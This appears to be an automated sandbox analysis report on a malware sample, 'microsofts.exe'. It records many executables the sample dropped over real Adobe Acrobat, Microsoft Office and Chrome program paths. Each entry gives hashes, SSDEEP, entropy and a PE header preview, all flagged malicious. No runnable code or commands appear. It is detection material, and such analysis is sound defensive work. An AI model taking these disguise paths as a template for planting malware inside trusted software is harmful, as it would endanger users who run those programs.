SHA-512:	E7C5E25007799D4F614231A89ACCAA19ECF3E7B007146EE5AEBA93DBBC985FF9177AF5F5F22D073830705745AD4AF77575E8C34CD2243041D90913E5AFC5244E
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@....................................6..... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3110912
Entropy (8bit):	6.649681511933257
Encrypted:	false
SSDEEP:	49152:DU198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeYlDmg27RnWGj:02NfHOIK5Ns6qR9rD527BWG
MD5:	26FEFDBC0608C5D560EAA2192A22070B
SHA1:	EBD5ACC34E8E9F077E514D3831B622406FF6C539
SHA-256:	F26B0ACAAA583363B71C28356DEE5511C37D603CC4E5453C776B6E5E77AD2F9A
SHA-512:	933B4CBE9E6D75C8B9FDEC6F8EA6859B387B935F1B4D0962FAB987C66CC18A7FA6D67C3CDD7E54F8B649F6AC2EC173C3B680A74C96C9CCEA143B11AB054B03F0
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0......./... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1588224
Entropy (8bit):	5.53193235091278
Encrypted:	false
SSDEEP:	24576:7kcWTUQcyd5sqjnhMgeiCl7G0nehbGZpbD:7hKUiDmg27RnWGj
MD5:	8F8E83AF01CB1063BA7FE9F26B5DF54C
SHA1:	6B8B7E518C9BB9A24F4B4A658C24807CD0BB05A3
SHA-256:	C82EE053C8143232D3CF61107BE8765E6683DFDC6948E675455F8322CD3C9EFE
SHA-512:	CA0059EB86672BDD16DC7846CDB63E544446ED510640833F1123D7E279CBE4E6E3C9DE84EAC0902D7DCC7E745C66462B4417D772AE5D521FBC47821350199B9B
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@.......................................... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...`...@...P..................@...................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1338368
Entropy (8bit):	5.352688111614072
Encrypted:	false
SSDEEP:	12288:ffY+FUBmXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:fA+qBmsqjnhMgeiCl7G0nehbGZpbD
MD5:	3E627A6A7F5E2388CD0EF850C3E5B757
SHA1:	15CCA0E004C7B46B80E76DFF73EF26DC0AA1FA96
SHA-256:	25A125CFD7578C9F655509CBF43E7F1F8936A9BFFCE9C9D835D9206F081AB87A
SHA-512:	F0075A2781105C327327DB0B9A1DE333B4CA6D59B3099DE8E80935BBBF043CC48885523E5132395537AA72CF285514149E3D4E8A83F56B1485265934092A4592
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@.................................................................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc...p...@...`..................@...................................................................................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1143296
Entropy (8bit):	5.022690897522171
Encrypted:	false
SSDEEP:	12288:/Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:/sqjnhMgeiCl7G0nehbGZpbD
MD5:	CE455FCD3564BC02D1FE3F406604A03C
SHA1:	31400D592A8682C9A4B4A65ECE9E1D7E63824CA9
SHA-256:	32D2DD61D9BF7FF87245DA5B58D843EB1A9684B27025A594B54E6DA191B43145
SHA-512:	C7FED6512346AC1592C74A7337ECE75106573F6D3BC202B8E3B7A8A34288C5D081E7119F919AA27C86B374CC3ABE3251BE9FFA1308463DEB881F23AA2A9EC07D
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@....................................k..... ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...\|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...P.......@...2..............@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1161728
Entropy (8bit):	5.047172578876161
Encrypted:	false
SSDEEP:	12288:3iXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:SsqjnhMgeiCl7G0nehbGZpbD
MD5:	C04A41AF2F750649151ED2E91B4C5660
SHA1:	110E41F3852DE59B950FACCA4EEC607C519E396A
SHA-256:	C221E2FE3E96E3381EF31C78B8E582F1516742838D738B7D2843C593F911B9C1
SHA-512:	5E5D74C246659F207E664660D944412ACEB59C4FE6B7FBEE164309A3D913DDC5D80CFF072AF2A8B16F06D7035EA067E2DB0961C21F430CBACC9EA9F103CB12DE
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..\|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@.......................................... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...P.......@...z..............@...........................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4151808
Entropy (8bit):	6.4997942432240965
Encrypted:	false
SSDEEP:	49152:ituUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755fDmg27RN:ijEIa4HIEWOc5FD527BWG
MD5:	D470083C2AD50527D950A1083B571984
SHA1:	9A3F52DAE65C4F3B5885F7C7FB7A9C7B06C66336
SHA-256:	94B28B277C4FE6861C393B0C43E5EBB1AD05E22CE7118804CE8E1150428F2F84
SHA-512:	02413E0B7D9BF6E10DE456A1A4DAED99859D50F5E7A6A16625BBFDED4D5E8584771CAE4049ACA44618516EF80E413842BCEB08E42DC67F13CEA314CD721138E7
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.......?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	59941376
Entropy (8bit):	7.999367332569557
Encrypted:	true
SSDEEP:	1572864:kQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:bXhwMhe6AABPiQwF6xQ22R
MD5:	71CA0B5565315A539D3018F0DFA3A8AD
SHA1:	4A246BD339D0488469ECCB1ACBFA42C3B2D095E6
SHA-256:	BD51C71A5BC5416441999BB9A08836AFD83045A078567CA53F8CB83628B7D323
SHA-512:	7412ED3AACD57FC5CF0F9D7AF440D37F3693677C2B5E1D2A248854A2D687D9F19AD5759071D5E5891EC211F532D93D189D338D5D14B2CBA2FD1C56D8617F3986
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0.......... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1230336
Entropy (8bit):	5.185610768060746
Encrypted:	false
SSDEEP:	12288:aejVWYUAiXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:3jkY7isqjnhMgeiCl7G0nehbGZpbD
MD5:	50FFA6C7A4A5C08B41AA430D6A1F0407
SHA1:	A211412B637359BABC6CA049FABC57B98BD3312B
SHA-256:	7C26E6355149C0291200A05774C0102388A0B19EBE77A8FCCD3EED2DD7014E4C
SHA-512:	8A0AFB65CB31293FE4F8B1DBD370C90F226E20B0724737CB01623BDEB534461F6052CB41C1C303A629F2C88FF6F9C27CB151B67C052D8F216E2C348171153021
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@..........................................................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...`.......P...v..............@...................................................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1384960
Entropy (8bit):	5.377833510227714
Encrypted:	false
SSDEEP:	24576:1xwSJhkrmZs+sqjnhMgeiCl7G0nehbGZpbD:1y+krKsSDmg27RnWGj
MD5:	4AEEBC0DAC02069BE7585B1772B27A1C
SHA1:	1C39D156C648D1D94C116729694B30C02F766AEF
SHA-256:	FDB150E2C1A3C24A12C921616536E8D722284CC8B0A38B8FD30EC6EE6F85D2AB
SHA-512:	B7D4E2E2D1E7CDCE3BE73F534D9745729CAB93E642230DB4DF75EF9E071265AE388A624A1F0D88CE6CA6ADEBF2A4F0426EC93F0A961A0D0B8F81E72E814C58FA
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@.......................................... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...P...0...@..................@...................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1649152
Entropy (8bit):	5.632757071740737
Encrypted:	false
SSDEEP:	24576:RHQJLIRgvsnN/sqjnhMgeiCl7G0nehbGZpbD:RHQJL34jDmg27RnWGj
MD5:	97AAD448E25B820E44290BEAAB7075B3
SHA1:	DFA7FA63EDD184D1DF99CD2839C542F06FFC709E
SHA-256:	D50EDA26150CFC780D5C293485D207C54F7EFED0000883184BC6EB67EB4DD207
SHA-512:	CBB43E3FD9A2E0CB39CBB45DB32C3B07E96AE7096C4986C79A6E95A8F21F7AD31E271552538B2598CAC04EE00E2C653EF6D3F4F559CAEDFD1BBCD37CB2655596
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@.......................................... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5365760
Entropy (8bit):	6.450975092096458
Encrypted:	false
SSDEEP:	49152:/UZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1ky:cWmXL6DEC7dRpKuDQbgYD527BWG
MD5:	858E6470DF26C9E38EA911C4BFA5E08D
SHA1:	D13CCBBDA7A814D36ABF7F7197081B537A021CB9
SHA-256:	8BE2A05FA5483D1BE534C6741BF57900960CA7DD5938EF1A5285B9BC89708663
SHA-512:	BE76F1685BBC3C9803432449FAC0FD5E11BA8A05E12C78C9757E70A30030C3ECDE642B56BAF103D92CABA6D1EB31927D18BC0BEE03A9579AC4FFCD4E6C772E36
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R.....6.R..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................

C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3163136
Entropy (8bit):	7.972781292755125
Encrypted:	false
SSDEEP:	98304:DrZ23AbsK6Ro022JjL2WEiVqJZ/D527BWG:XJADmmxL2WEoCZ/VQBWG
MD5:	5FDFD60D8CDEFE50A05EBAB882DA7B73
SHA1:	9167D8C6EC64139C017ED6BBB4651718BF3BAF41
SHA-256:	8C396E6D412F164C994D004066A7D2D2B8C5F84EC817F5A801FA86019C98D07C
SHA-512:	F3346BFA3628920B2A27732A64EBCB49E969A1B8D860824F3CB3CF9DA747B0F67641B33502A0806C06ED8BAFA06C23891268D3CFBAEB27530A2ACDE35A1FCC33
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1.....6.1.......... .....................................0............................!............................................... ...............................text....\|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1213440
Entropy (8bit):	7.204945195410029
Encrypted:	false
SSDEEP:	24576:DfrYY42wd7hlOw9fpkEE64usqjnhMgeiCl7G0nehbGZpbD:iz9xrSCDmg27RnWGj
MD5:	4CC45D74F4C616ECDBFAD9D632129215
SHA1:	9EC8A4E99FE9BDA25348ED21E700A30381089586
SHA-256:	004627D84C085D66FFD40941EB176D2971D5FEF953E62B30A784448C70464679
SHA-512:	68A14BAF87CAC6058B8D6961DD84D10F7BAC33DF22A951701D6579F43CEB4D7316B59A74905B50C6102540AC7C39E02C689F9EE709E06801B6AB965F942FEA8E
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. ............ ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1388544
Entropy (8bit):	5.272966492761615
Encrypted:	false
SSDEEP:	12288:NwkNKiZ+R2GGNUbTF5xXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/T:NzNKUE5xsqjnhMgeiCl7G0nehbGZpbD
MD5:	24BE17DE4D7021D4A44A8A8A83CE5D69
SHA1:	B3FB1453EE699D3B82CE18699FB80D63E1FEA9F3
SHA-256:	54F625767001546ECFC961A88D9D1AF8EC0E7560FB1BA1406C5FE15000ECE253
SHA-512:	6E27AD38070B90E24DA23EF5819D3E8F3A97EF8957A42370A4B4F7F588F59A926556D016D581135CC041473C4EBF56C5902C29FC95BE68DED035A7F40196D622
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................P............ .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5855744
Entropy (8bit):	6.574341424294601
Encrypted:	false
SSDEEP:	98304:YALuzDKnxCp3JKNrPJzruaI6HMaJTtGbED527BWG:jaGg3cFPIaI6HMaJTtGbEVQBWG
MD5:	F557BA90293AD1DF1DF866150BB7F884
SHA1:	2FC418F47DBE3F40F3FB07C2E2F2AFC597C248E5
SHA-256:	6A97A4710B28B9266930762BAC3EF5B73C9027E61FB35D57FEAC8DB4B1E4A16C
SHA-512:	FC4A91EF1C7B6D28AB290410C74F9078459B4C1E538948ABB3D93822EC2CB80534DC1A63E35D34029BE6FD8883C855B000D40CEC3DDA5AB037F39120130360C4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y.......Z... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1312768
Entropy (8bit):	5.356084043888826
Encrypted:	false
SSDEEP:	24576:/Xr/SVMxWasqjnhMgeiCl7G0nehbGZpbD:j1x/Dmg27RnWGj
MD5:	881E6AFD7B417A8A4AEE4EC1DF3DFB09
SHA1:	415DDD28C77237B8B09B15BB32CF672E2B9A5618
SHA-256:	A82ADF32960D2BA9DCD6D3CF4A506DAF9D63CC67330FA4AD69435DDC898BAC11
SHA-512:	8C687B1BBE0B9F532EB467332D2EAD37A49E2648115FC8E78D9701DFFBFB1B9F99FB2E84B309909102CC74892CB58DCBDA76A4AC4C21C5CE68A3A0A6E809A6AB
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................P......x............ ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc...p.......`..................@...........................................................................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	27533312
Entropy (8bit):	6.248638389298296
Encrypted:	false
SSDEEP:	196608:khRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQOoVQBWG:khRCpGpMJMrbp8JjpNdNlc5AB
MD5:	05CDCB8EAF4E7424521797C08CDD3AB3
SHA1:	F9B84C21F261A37F2FFC1E31EC430F39DE7B12EF
SHA-256:	26E6EB1AEC952725BA56BBC090547BDA90D6BD4403C823C99B97C3E41058ED86
SHA-512:	B69E7653E175FA06F9E8D47BC5EECC5A154FE383F4EA10BB820DB9D37449A78100977F71AD69FB465A0BED6C6C52C8559916B8BC94F61CCB441A6BA4CC6B68C9
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.\|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@......................................... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2199552
Entropy (8bit):	6.789030216366654
Encrypted:	false
SSDEEP:	49152:A83pZ3kd0CuEeN0LUmRXzYs65mwDmg27RnWGj:sKuUQY15zD527BWG
MD5:	ABFE8E9754BF8959B5CF9CBAF371EB44
SHA1:	F61DA57A6C06D98D2F9586CB1B1E2825E591ECAB
SHA-256:	134273F7253148EEDA0C1CDFBB2C2BB66A7DC1BF0E07154E9E669CBA8C263CC9
SHA-512:	0FE885224F5432685DB71F44E2E7586F1270FB811F2FAD2124D438A6F7A60C196DF035E504B8B98BBEA517E0E3026A312B6D527BAE9910BDA35F3C97CDA726E0
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!......-"... .......... ......................................P...\|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4971008
Entropy (8bit):	6.67084613282071
Encrypted:	false
SSDEEP:	49152:rErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+Mj:NA4oGlcR+glEdOPKzgVZOD527BWG
MD5:	E3892AE9FF82EBB60F5DF32C1D22F18A
SHA1:	82B9CB369C53AE8F872808E5A9365FAB182E3952
SHA-256:	3A2C7CB014BCB5660E89998558466B60F2D53B7A2010986CDC69474DDE03DC43
SHA-512:	BA34156D262D471903F7E19FEB7BB42D41CA95F26FFF5CE24BA273FBF1B319CDA773605E8F02C52E8C41B4335BC4C5B10D03E4571C281BA62718D6B8104A674F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L.......L... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4897792
Entropy (8bit):	6.82977126149854
Encrypted:	false
SSDEEP:	49152:t8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKQ:Iv2gM+qwXLg7pPgw/DSZHAD527BWG
MD5:	E55FE32A87703A18EAB1BF0C615FA299
SHA1:	51211F057841BE2AB28242A380A14C1FF6695548
SHA-256:	90657DAF52F8307D44A2E474E66886C19C4E9A8EF4A1176F92F9FE78B71CA31C
SHA-512:	C8A47F527B7C6B4351F7430D8C45A365B6BC04D94CDA475B25E7C84508934EBB018A5DF39AFA1255C91A8D925D01F3ADB93A2C2B865BCC7ECED789FA62A88740
Malicious:	true
Reputation:	unknown
